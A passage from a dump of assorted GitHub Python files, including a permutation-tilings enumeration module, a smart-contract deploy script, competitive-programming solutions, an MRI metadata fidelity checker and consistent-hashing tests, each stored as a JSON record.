the number of point in the\n given cell.\n \"\"\"\n return var(f\"y_{cell[0]}_{cell[1]}\")\n\n def _interleave_any_length(self, F, cell):\n \"\"\"\n Return the generating function for interleaving any number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n cell_var = self._cell_variable(cell)\n gap_filler = 1 / (1 - x * cell_var)\n return F.subs({self._tracking_var: gap_filler}) * gap_filler\n\n def _interleave_fixed_lengths(self, F, cell, min_length, max_length):\n \"\"\"\n Return the generating function for interleaving between min_point and\n max_point (both included) number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n return sum(\n self._interleave_fixed_length(F, cell, i)\n for i in range(min_length, max_length + 1)\n )\n\n def _interleave_fixed_length(self, F, cell, num_point):\n \"\"\"\n Return the generating function for interleaving num_point\n number of point of a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n new_genf = self._tracking_var**num_point * F\n for i in range(1, num_point + 1):\n new_genf = diff(new_genf, self._tracking_var) / i\n new_genf *= self._cell_variable(cell) ** num_point\n new_genf *= x**num_point\n return new_genf.subs({self._tracking_var: 1})\n\n def _cell_num_point(self, cell):\n \"\"\"\n Return a pair of integer `(min, max)` that describe the possible\n number of point in the cell. If the number of point is unbounded,\n `max` is None.\n\n We assume that the cell is monotone\n \"\"\"\n obs, reqs = self.tiling.cell_basis()[cell]\n ob_lens = sorted(map(len, obs))\n assert ob_lens[0] == 2, \"Unexpected obstruction\"\n assert len(reqs) <= 1, \"Unexpected number of requirement\"\n if len(obs) == 1:\n maxlen = None\n elif len(obs) == 2:\n maxlen = ob_lens[1] - 1\n else:\n raise RuntimeError(\"Unexpected number of obstructions\")\n if not reqs:\n minlen = 0\n elif len(reqs) == 1:\n minlen = len(reqs[0])\n else:\n raise RuntimeError(\"Unexpected number of requirements\")\n return minlen, maxlen\n\n\nclass DatabaseEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a tilings that are in the database.\n\n There is not always a specification for a tiling in the database but you can always\n find the generating function and the minimal polynomial in the database.\n \"\"\"\n\n API_ROOT_URL = \"https://api.permpal.com\"\n all_verified_tilings: FrozenSet[bytes] = frozenset()\n num_verified_request = 0\n\n @classmethod\n def load_verified_tiling(cls):\n \"\"\"\n Load all the verified tiling in the attribute `all_verified_tilings` of\n the class.\n\n That speeds up the verification test.\n \"\"\"\n if not DatabaseEnumeration.all_verified_tilings:\n uri = f\"{cls.API_ROOT_URL}/all_verified_tilings\"\n response = requests.get(uri, timeout=10)\n response.raise_for_status()\n compressed_tilings = map(bytes.fromhex, response.json())\n cls.all_verified_tilings = frozenset(compressed_tilings)\n\n def _get_tiling_entry(self):\n \"\"\"\n Retrieve the tiling entry from the database. 
Returns None if the tiling\n is not in the database.\n \"\"\"\n key = self.tiling.to_bytes().hex()\n search_url = f\"{DatabaseEnumeration.API_ROOT_URL}/verified_tiling/key/{key}\"\n r = requests.get(search_url, timeout=10)\n if r.status_code == 404:\n return None\n r.raise_for_status()\n return r.json()\n\n def verified(self):\n \"\"\"\n Check if a tiling is verified.\n\n After a 100 checks it loads all the saved tiling from the database to\n speed up future requests.\n \"\"\"\n DatabaseEnumeration.num_verified_request += 1\n if DatabaseEnumeration.all_verified_tilings:\n return self.tiling.to_bytes() in DatabaseEnumeration.all_verified_tilings\n if DatabaseEnumeration.num_verified_request > 10:\n DatabaseEnumeration.load_verified_tiling()\n return self._get_tiling_entry() is not None\n\n def get_genf(self, **kwargs) -> Any:\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n return sympify(self._get_tiling_entry()[\"genf\"])\n","repo_name":"PermutaTriangle/Tilings","sub_path":"tilings/algorithms/enumeration.py","file_name":"enumeration.py","file_ext":"py","file_size_in_byte":14317,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"32380297932","text":"from brownie import *\nimport os\n\ndef deploy_backedby(deployer):\n from0 = {'from': deployer}\n profiles = BBProfiles.deploy(from0)\n posts = BBPosts.deploy(profiles, from0)\n tiers = BBTiers.deploy(profiles, from0)\n subfactory = BBSubscriptionsFactory.deploy(profiles, tiers, deployer, from0)\n\n gasOracle = DebugGasOracle.deploy(from0)\n subfactory.setGasOracle(gasOracle, from0).wait(2)\n \n tokens = [\n {'name': \"USDC\", 'address': \"0x8f7116CA03AEB48547d0E2EdD3Faa73bfB232538\"},\n {'name': \"USDT\", 'address': \"0x0afF29eeCf746EC239C8DA3E8e630F46FCaBC48e\"},\n {'name': \"DAI\", 'address': \"0xd393b1E02dA9831Ff419e22eA105aAe4c47E1253\"},\n {'name': \"TUSD\", 'address': \"0x3c75bd0e659b8bd426b3b9a1d93b75bb9c97de10\"}\n ]\n\n for i, token in enumerate(tokens):\n tx = subfactory.deploySubscriptions(token['address'], from0)\n tx.wait(2)\n token['subaddress'] = subfactory.getDeployedSubscriptions(token['address'])\n #remove gas change for live\n #subfactory.setSubscriptionFee(token['address'], 1, from0)\n\n print(\"profiles\", profiles)\n print(\"posts\", posts)\n print(\"tiers\", tiers)\n print(\"subfactory\", subfactory)\n print(\"gas oracle\", gasOracle)\n\n \n for i, token in enumerate(tokens):\n print(token['name'], token['address'], \"=>\", token['subaddress'])\n\n\ndef main():\n \n if(os.environ.get(\"DEPLOYER_PRIVATEKEY\") != None):\n deployer = accounts.add(os.environ.get(\"DEPLOYER_PRIVATEKEY\"))\n elif(len(accounts) > 0):\n deployer = accounts[0]\n\n if(deployer.balance() >= 1e17):\n deploy_backedby(deployer)","repo_name":"backedby/v1-contracts","sub_path":"scripts/josh/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39241896127","text":"from math import log10\nfrom time import time\n\ndef main():\n Ln, n, a, b = 1000, 3, 2, 0\n for i in range(2, Ln+1):\n n, a = n + 2*a, n + a\n if int(log10(n)) > int(log10(a)): \n b += 1\n return b\n\nif __name__==\"__main__\":\n start = time()\n print(f\"\\nAnswer: { main() }\")\n print(f\"Time Taken: { time() - start }\\n\")\n\n 
\n","repo_name":"fermihacker/Project-Euler","sub_path":"Python/Problem057.py","file_name":"Problem057.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30421383437","text":"from collections import deque\n\nN,M = map(int,input().split())\n\ngraph = []\n\nfor i in range(N):\n k = list(input())\n for j in range(M):\n if k[j] == 'B':\n b = [i,j]\n if k[j] == 'R':\n r = [i,j]\n graph.append(k)\n\n\nvisited = [[[[False]*M for i in range(N)] for i in range(M) ] for i in range(N)]\n\ndef move(x,y,dx,dy):\n c = 0\n\n while graph[x+dx][y+dy] != '#' and graph[x][y] != 'O':\n x +=dx\n y +=dy\n c+=1\n return x,y,c \n\n\ndef bfs():\n dx = [1,-1,0,0]\n dy = [0,0,1,-1]\n q = deque()\n q.append((r[0],r[1],b[0],b[1],1))\n visited[r[0]][r[1]][b[0]][b[1]] = True\n\n while q:\n rx,ry,bx,by,cnt = q.popleft()\n if cnt > 10 :\n break\n \n for i in range(4):\n nrx,nry,rc = move(rx,ry,dx[i],dy[i])\n nbx,nby,bc = move(bx,by,dx[i],dy[i])\n if graph[nbx][nby] != 'O':\n if graph[nrx][nry] == 'O':\n print(1)\n return \n if nrx == nbx and nry == nby :\n if rc > bc :\n nrx -=dx[i]\n nry -=dy[i]\n else:\n nbx -=dx[i]\n nby -=dy[i]\n if visited[nrx][nry][nbx][nby] == False:\n visited[nrx][nry][nbx][nby] = True\n q.append((nrx,nry,nbx,nby,cnt+1))\n \n print(0)\n return \n\nbfs()\n\n \n","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/graphs/13459.py","file_name":"13459.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4475884207","text":"# PURPOSE\n# This file reads a json template file and constructs a dictionary of\n# field-value pairs. When passed a relevant fidelity file, it compares the\n# empirical field values in it against this dictionary and returns which tests\n# it passed and which it failed\n# Author: Austin Marcus (axm6053@psu.edu)\n\n# Assumptions being made:\n##Questionable:\n## The target json sub-elemnt name should exactly match oart of the file name\n#\t# however, this may be inconsistent. Best match is with the SeriesDescription element\n## a \"-\" in json fields is equivalent to a \"_\" --> should remove this assumption. made because of mismatch with SeriesDescription.\n#\n##Valid:\n## values from json template that are a single element vector (e.g. [5]) are equivalent to the single element (data from experimental json files is not bracketed) --> valid\n## if a list (dim or pixdim) is longer in the experimental data than the list given in the template json, only look at up till the length of the template list\n\nimport json\nimport os\nimport sys\nfrom . import helper\n\nTOL = .01\nmanual_verify = False\n\n# this class organizes the data associated with a single file analysis: a comparison of a single file against the json template file\nclass fileAnalysis:\n\n\tdef __init__(self, filename, fileSuffix, task, scanType, subID, runNum, fidelityChecks):\n\t\tself.filename = filename # the filename, not the path\n\t\tself.fileSuffix = fileSuffix # the suffix of the file (json or nii)\n\t\tself.task = task # the task done during the scan. (rest_post, ...)\n\t\tself.scanType = scanType # the type of scan done. 
(bold or sbref)\n\t\tself.subID = subID\n\t\tself.fidelityChecks = fidelityChecks # array of fidelity_check objects\n\t\tself.runNum = runNum # run number for the current task\n\t\n\t# INPUT:\n\t#\tother: a fileAnalysis object\n\t# OUTPUT:\n\t#\tTrue if the only thing different between this fileAnalysis and the other is their file suffix. that is, they represent the same scan, just one is the nifti file and the other is the json file\n\t#\tFalse otherwise\n\tdef sameScan(self, other):\n\t\tif self.task == other.task and self.scanType == other.scanType and self.subID == other.subID and helper.getUpperPathFromPath(self.filename) == helper.getUpperPathFromPath(other.filename) and self.runNum == other.runNum:\n\t\t\treturn True\n\t\treturn False\n\n\tdef print(self):\n\t\tprint(\"Scan type: \" + self.task + \"\\nFile type: \" + self.scanType + \"\\nFile suffix: \" + self.fileSuffix + \"\\nSubject Id: \" + str(self.subID) + \"\\nRun number\" + str(self.runNum))\n\t\tprint(\"\\t\" + str(self.fidelityChecks))\n\t\tprint()\n\n# fed an experimental json file and compares against values\nclass fidelityTemplate:\n\t\n\tdef __init__(self, jsonFileName):\n\t\t#print(\"in fidelityTemplate\")\n\t\tf = open(jsonFileName, \"r\")\n\n\t\t# convert raw json to dictionary\n\t\tself.data = json.load(f)\n\t\tfor dict1 in self.data:\n\t\t\tfor key1 in self.data[dict1]:\n\t\t\t\tfor key2 in self.data[dict1][key1]:\n\t\t\t\t\tself.data[dict1][key1][key2] = self.interpret(self.data[dict1][key1][key2])\n\t\n\t# takes as input a string, and attempts to convert it to a number\n\t# if given a list with one element, will break it out of the list as well\n\tdef interpret(self, data):\n\n\t\tif type(data) == list and len(data) == 1: # breaks out single element list\n\t\t\tdata = data[0]\n\t\t\n\t\tif type(data) == list:\n\t\t\t# iterate on each\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = self._interpret(data[i])\n\n\t\telse: # just do it once\n\t\t\tdata = self._interpret(data)\n\n\t\treturn data\n\n\tdef _interpret(self, data):\n\t\ttry: # tries to convert to number\n\t\t\tdata = float(data)\n\t\texcept: \n\t\t\t#data = data.replace(\"-\",\"_\") # assuming it must be a string at this point if not a number\n\t\t\tpass\n\n\t\treturn data\n\t\t\n\t# decides how to get data from given file\n\tdef getExData(self, exFileName, fileSuffix):\n\t\t# select wether comparing to json file or nifti file \n\t\tif fileSuffix == \"json\":\n\t\t\t\n\t\t\tf = open(exFileName, \"r\")\n\t\t\texData = json.load(f)\n\n\t\telif fileSuffix == \"nifti\": \n\t\t\texData = {}\n\t\t\traw = os.popen(\"fslhd \" + str(exFileName)).read()\n\t\t\tfor line in raw.split(\"\\n\"):\n\t\t\t\tline = line.split(\"\\t\")\n\t\t\t\tlineParts = list(filter(lambda x: x != \"\\t\" and x != \"\", line))\n\t\t\t\tif len(lineParts) != 2:\n\t\t\t\t\tcontinue\n\t\n\t\t\t\tlineParts[1] = self.interpret(lineParts[1])\n\t\t\n\t\t\t\t# consider aggregating specific fields into array to match format of desired json\n\t\t\t\tspecs = [\"dim\", \"pixdim\"]\n\t\t\t\tmatched = False\n\t\t\t\tfor i in specs:\n\t\t\t\t\tif i == lineParts[0][:len(i)]: #match\n\t\t\t\t\t\tmatched = True\n\t\t\t\t\t\t# if first one, initialize\n\t\t\t\t\t\tif exData.get(i) == None:\n\t\t\t\t\t\t\texData[i] = []\n\t\t\t\t\t\texData[i].append(lineParts[1])\n\t\t\t\t\t\t\t\n\t\t\t\tif not matched:\n\t\t\t\t\texData[lineParts[0]] = lineParts[1]\n\n\t\treturn exData\n\n\t# returns the scan type (rest_pre, rest_post) by extraction from filename\n\t# returns file type (json or nifti) by checking file 
suffix\n\t# returns subject ID number\n \t # return run number from filename\n\tdef parseFileName(self, filename):\n\t\tsubID = helper.getSubjectIdOfPath(filename)\n\t\ttask = helper.getTaskFromFilename(filename)\n\t\trunNum = helper.getRunNumberFromFilename(filename)\n\t\tif task == \"T1w\":\n\t\t\tscanType = \"---\"\n\t\telse:\n\t\t\tscanType = helper.getScanType(filename)\n\t\tfileSuffix = helper.getFileSuffix(filename)\n\t\t\n\t\treturn task, fileSuffix, subID, scanType, runNum\n\n\tdef guessIsKey(self, key, guess):\n\t\tkey_mod = key.replace('_', '').replace('-', '').lower()\n\t\tguess = guess.replace('_', '').replace('-', '').lower()\n\n\t\treturn key_mod == guess\n\n\tdef isTaskInTemplate(self, task):\n\t\t# check if task is specified in template file\n\t\ttry:\n\t\t\tself.data[task]\n\t\t\treturn True\n\t\texcept:\n\t\t\tfor key in list(self.data.keys()):\n\t\t\t\tif self.guessIsKey(key, task):\n\t\t\t\t\treturn key\n\t\t\treturn False\n\n\t# pass file name to compare object. \n\t# checks that target fields match fields in the data file\n\t# returns a 3-tuple: (task, subID, output)\n\t# \t\toutput: array of 2-tuples: (field, [0,1])\n\tdef compareToFile(self, exFileName):\n\t\t# parse filename to get scan and file type\n\t\ttask, fileSuffix, subID, scanType, runNum = self.parseFileName(exFileName)\n\t\tif task == None:\n\t\t\treturn None\n\n\t\tret = self.isTaskInTemplate(task)\n\t\tif ret == False:\n\t\t\treturn None\n\t\telif ret != True:\n\t\t\ttask = ret\n\t\n\t\t# task name in template file has _sbref for sbref files\n\t\tif scanType == \"sbref\":\n\t\t\ttaskTemp = task + \"_sbref\"\n\t\telse:\n\t\t\ttaskTemp = task\n\n\t\t# get the data from the file\n\t\texData = self.getExData(exFileName, fileSuffix)\n\t\t# select which set of fidelity checks applies to this file\n\t\tchecks = self.data[taskTemp][fileSuffix]\n\t\t\n\t\toutput = []\n\t\tif (manual_verify):\n\t\t\tprint(\"file: \" + exFileName)\n\t\tfor key in checks: # attempting to check only based on fields present in template file; assumption that data files should have a superset\n\t\t\tif (manual_verify):\n\t\t\t\tprint(\"key: \" + key + \"\\n\\ttemplt: \" + str(checks[key]) + \"\\n\\tactual: \", end=\"\")\n\t\t\tcur_check = helper.fidelity_check(key)\n\t\t\t# check if key in data file\n\t\t\ttry:\n\t\t\t\texData[key]\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(exData[key], end=\"\\n\")\n\t\t\texcept:\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"not present\", end=\"\\n\")\n\t\t\t\tcur_check.failCheck(str(checks[key]) + helper.fidelity_check.diff_delim + str(\"not present\"))\n\t\t\t\toutput.append(cur_check)\n\t\t\t\tcontinue\n\n\t\t\tequal, indicies = self.compareObjects(exData[key], checks[key])\n\t\t\tif equal:\n\t\t\t\tcur_check.passCheck()\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t0\", end=\"\")\n\t\t\telse:\n\t\t\t\t# if it differed by an element in a list, pass the index\n\t\t\t\tif indicies != None:\n\t\t\t\t\t# build string: \"/@:...\"\n\t\t\t\t\tresult = \"\"\n\t\t\t\t\tfor i in indicies:\n\t\t\t\t\t\tresult += (\"%s%s%s%s%d\" % (str(checks[key][i]), helper.fidelity_check.diff_delim, str(exData[key][i]), helper.fidelity_check.addr_char, i))\n\t\t\t\t\t\tresult += \":\"\n\t\t\t\t\tresult = result[:-1]\n\n\t\t\t\t\tcur_check.failCheck(result)\n\t\t\t\telse:\n\t\t\t\t\tcur_check.failCheck(str(checks[key]) + helper.fidelity_check.diff_delim + str(exData[key]))\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t1\", end=\"\")\n\n\t\t\tif 
(manual_verify):\n\t\t\t\tprint()\n\t\t\toutput.append(cur_check)\n\n\t\tif (manual_verify):\n\t\t\tprint()\n\n\t\t# sort output by key name to ensure consistency\n\t\toutput = sorted(output, key=lambda x: x.getName()) \n\t\treturn fileAnalysis(exFileName, fileSuffix, task, scanType, subID,runNum, output)\n\n\t# assuming objects have been interpreted at this point\n\t# takes two objects, that is, a piece of text, a number, or an array of either and tests their equality\n\t# these objects are the values of the fields from the template json and the experimental data\n\tdef compareObjects(self, exOb, templateOb):\n\n\t\t# compare each element of a list\n\t\tif type(exOb) == list and type(templateOb) == list:\n\t\t\tindicies = []\n\t\t\tfor i in range(len(templateOb)):\n\t\t\t\tif self._compareObjects(exOb[i], templateOb[i]) == False:\n\t\t\t\t\tindicies.append(i)\n\t\t\n\t\t\tif len(indicies) == 0:\n\t\t\t\treturn (True, None)\n\t\t\telse:\n\t\t\t\treturn (False, indicies)\n\t\t\t\n\t\telif type(exOb) == list or type(templateOb) == list:\n\t\t\treturn (False, None)\n\t\telse:\n\t\t\treturn (self._compareObjects(exOb, templateOb), None)\n\n\tdef _num_in_tol(self, num1, num2):\n\t\treturn num1 < num2 + TOL and num1 > num2 - TOL\n\n\tdef _compareObjects(self, exOb, templateOb):\n\n\t\tif type(templateOb) == str and type(exOb) != str:\n\t\t\t# get number in template object\n\t\t\tnum = float(templateOb[:-1])\n\t\t\tif templateOb[-1] == \"+\":\n\t\t\t\tif self._num_in_tol(num, exOb) or num < exOb:\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\telif type(templateOb) == str and type(exOb) == str:\n\t\t\tif exOb == templateOb:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn exOb.replace(\"-\",\"_\") == templateOb.replace(\"-\",\"_\")\n\t\telse:\n\t\t\treturn self._num_in_tol(exOb, templateOb)\n\t\t\t\t\n","repo_name":"UNCDEPENdLab/fmriprep_pipeline","sub_path":"mri_fidelity_checks/mri_fidelity_checks/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20546713552","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('9958E83F5A6C4B6D30.jpg', 0)\n\nprint(img.shape)\n\nx, y = img.shape\n\nprint(x)\nprint(y)\n\n_x = 64\n_y = 64\nk = 0\n\n# 이미지 하나씩 자르기\nfor i in range(0, y, _y):\n for j in range(0, x, _x):\n k = k + 1\n if k == 5:\n testimg = img[i:i+_x, j:j+_y]\n cv2.imshow('testimage',testimg)\n\n\n\n\ncv2.imshow('image',img)\ncv2.waitKey(0)","repo_name":"donaldaq/opencv","sub_path":"codes/cropped.py","file_name":"cropped.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27389979402","text":"from collections import Counter\nfrom statistics import mean\n\nfrom consistent_hash import ConsistentHash, Node\nfrom faker import Faker\n\n\ndef test_get_node_of_key_successfully():\n # given\n consistent_hash = ConsistentHash(\n nodes=[\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ],\n )\n faker = Faker()\n\n n_data = 10\n for _ in range(n_data):\n\n # when\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n\n # then\n assert node.id in [\"1\", \"2\", \"3\"]\n\n\ndef test_get_node_of_key_should_divide_the_keys_evenly():\n # given\n nodes = [\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ]\n consistent_hash = ConsistentHash(nodes=nodes)\n faker = Faker()\n node_ids = 
[]\n\n # when\n n_data_per_node = 100\n n_data = n_data_per_node * len(nodes)\n for _ in range(n_data):\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n node_ids.append(node.id)\n\n # then\n counter = Counter(node_ids)\n print(counter)\n error_rate = 0.20\n lower_bound = n_data_per_node - int(n_data_per_node * error_rate)\n upper_bound = n_data_per_node + int(n_data_per_node * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert counter[\"1\"] in expected_values\n assert counter[\"2\"] in expected_values\n assert counter[\"3\"] in expected_values\n\n\ndef test_consistent_hash_do_after_add_a_node_successfully():\n n_test = 100\n n_diffs = []\n faker = Faker()\n n_data = 100\n initial_data = [faker.email() for _ in range(n_data)]\n n_nodes = 3\n nodes = [Node(id=str(i)) for i in range(1, n_nodes + 1)]\n for _ in range(n_test):\n consistent_hash = ConsistentHash(nodes)\n initial_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n initial_key_to_node[key] = node\n\n consistent_hash.add_node(Node(id=\"4\"))\n after_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n after_key_to_node[key] = node\n\n n_diff = 0\n for key in initial_data:\n if initial_key_to_node[key] != after_key_to_node[key]:\n n_diff += 1\n n_diffs.append(n_diff)\n\n error_rate = 0.35\n expected_diff = int(len(initial_data) / 4)\n lower_bound = expected_diff - int(expected_diff * error_rate)\n upper_bound = expected_diff + int(expected_diff * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert int(mean(n_diffs)) in expected_values\n","repo_name":"heumsi/implementing-system-design-interview","sub_path":"05-design-consistent-hashing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5144811998","text":"# when writing a function you can define a default value\r\n# if an argument for a parameter is provided in the functional call python uses the argument value\r\n\r\ndef describe_pet( pet_name, animal_type = \"dog\"):\r\n \"\"\"Display information about a pet\"\"\"\r\n print(\"\\nI have a \" + animal_type + \".\")\r\n print(\"My \" + animal_type + \"'s name is \" + pet_name.title() + \".\")\r\n\r\ndescribe_pet(pet_name= \"wes\")\r\ndescribe_pet(animal_type= \"turtle\", pet_name= \"terry the turtle\") # in order to change animal_type it first must ...\r\n# ... 
be defined","repo_name":"JamCrumpet/Lesson-notes","sub_path":"Lesson 7 function/7.8_default_values.py","file_name":"7.8_default_values.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9530466881","text":"\nfrom multiprocessing import Pool\n\np = Pool(4)\n\n#make local directories if they don't exist\ndef make_dir(directory):\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\n#get all subdirs\n\nimport os, glob\nsrcdir = \"xml\"\ndstdir = \"/media/backup/aps/xml/\"\n\nsrcfolders = []\nfor root, dirs, files in os.walk(srcdir):\n\t#make folder copies at the destination so they exist\n\tsrcfolders.extend(dirs)\n\tbreak\n\nfor f in srcfolders[0]:\n\tnewroot = dstdir + f\n\t#make_dir(newroot)\n\tdstpattern = \"xml/\" + f + \"/*.xml\"\n\tsource_files = glob.glob(dstpattern)\n\tdest_files = [i.replace(srcdir+\"/\", dstdir) for i in source_files]\n\t\n\n#for each directory, copyfile in parallel \np.map(f, args=(srcfolders, dstfolders))\n","repo_name":"mjlavin80/aps-elastic-scripts","sub_path":"copy-json.py","file_name":"copy-json.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5371398706","text":"# 키로거\n# https://www.acmicpc.net/problem/5397\n# Stack 2개 이용\n\n\ndef getKey(s):\n beforeCursor = []\n afterCursor = []\n for token in s:\n if token == '>':\n if afterCursor:\n beforeCursor.append(afterCursor.pop())\n elif token == '<':\n if beforeCursor:\n afterCursor.append(beforeCursor.pop())\n elif token == '-':\n if beforeCursor:\n beforeCursor.pop()\n else:\n beforeCursor.append(token)\n return \"\".join(beforeCursor) + \"\".join(reversed(afterCursor))\n\n\ntestCaseNum = int(input())\n\nfor _ in range(testCaseNum):\n s = input()\n key = getKey(s)\n print(key)\n","repo_name":"YimJiYoung/Daily-DataStructure-Algorithm","sub_path":"DataStructure/Stack_Queue/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20159703720","text":"with open(\"7/rules.txt\") as f:\n rules = f.readlines()\n\n\ndef get_containers(color: str):\n res = []\n for rule in rules:\n if color in rule:\n rule = rule.strip().split(\" \")\n res.append(rule[0] + \" \" + rule[1])\n return res\n\n\n# def check(color: str):\n# result = list(set(get_containers(color)))\n# print(\"Res: \", result)\n# if len(result) == 0:\n# return 0\n# else:\n# num = 0\n# for res in result:\n# if res == color:\n# num -= 1\n# continue\n# num += check(res)\n# return len(result) + num\n\ndef check(color: str):\n print(\"Color: \", color)\n result = list(set(get_containers(color)))\n result.remove(color)\n print(\"Result: \", result)\n\n if len(result) < 1:\n return []\n\n temp = []\n for res in result:\n temp.extend(set(check(res)))\n result.extend(temp)\n return list(set(result))\n\n\nres = check(\"shiny gold\")\nprint(\"Result: \", len(res))\n","repo_name":"vaerl/advent-of-code-2020","sub_path":"7/rules-1.py","file_name":"rules-1.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5062810333","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef solve(N: int, M: int, C: \"List[str]\", D: \"List[str]\", P: \"List[int]\"):\n d = {}\n for i in range(M):\n d[D[i]] = P[i + 1]\n ans = 0\n for cc in C:\n if cc not 
in d:\n ans += P[0]\n else:\n ans += d[cc]\n print(ans)\n\n return\n\n\n# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n C = [next(tokens) for _ in range(N)] # type: \"List[str]\"\n D = [next(tokens) for _ in range(M)] # type: \"List[str]\"\n P = [int(next(tokens)) for _ in range(M + 1)] # type: \"List[int]\"\n solve(N, M, C, D, P)\n\nif __name__ == '__main__':\n main()\n","repo_name":"K53/atcoder-workspace","sub_path":"abc308/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33554381112","text":"# pylint: disable=unused-variable\nfrom aiohttp import web\nimport pytest\n\n\n@pytest.mark.parametrize(\n ['params'],\n [\n ({'lines': ['first', 'second'], 'logins': ['user_1']},),\n ({'logins': ['user_2']},),\n ({'lines': ['first', 'new']},),\n ({},),\n ],\n)\nasync def test_chatterbox_stats(web_app_client, params, mock_chatterbox_py3):\n @mock_chatterbox_py3('/v1/users/statuses', prefix=True)\n def handler(request):\n assert request.query.getall('lines', []) == params.get('lines', [])\n assert request.query.getall('logins', []) == params.get('logins', [])\n return web.json_response(\n {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n },\n )\n\n params_to_send = {}\n for key, value in params.items():\n if isinstance(value, list):\n value = '|'.join(value)\n params_to_send[key] = value\n response = await web_app_client.get(\n '/v1/chatterbox/users/stat', params=params_to_send,\n )\n data = await response.json()\n\n assert data == {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n }\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_support_metrics/web/test_get_users_stat.py","file_name":"test_get_users_stat.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73871887890","text":"with open(\"input.txt\") as f:\n count = 0\n for line in f.readlines():\n line = line[:-1]\n vals = line.split(\",\")\n a = vals[0].split(\"-\")\n b = vals[1].split(\"-\")\n\n alo = int(a[0])\n ahi = int(a[1])\n\n blo = int(b[0])\n bhi = int(b[1])\n\n # a\n if (alo <= blo and ahi >= bhi) or (blo <= alo and bhi >= ahi):\n count += 1\n\n # b\n # if not (ahi < blo or bhi < alo):\n # count += 1\n\n print(count)\n","repo_name":"david-j-xu/2022-Advent-of-Code","sub_path":"04/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37236076437","text":"from leads.models import Lead,Suggestion,List,Favorite\nfrom leads.serializers import 
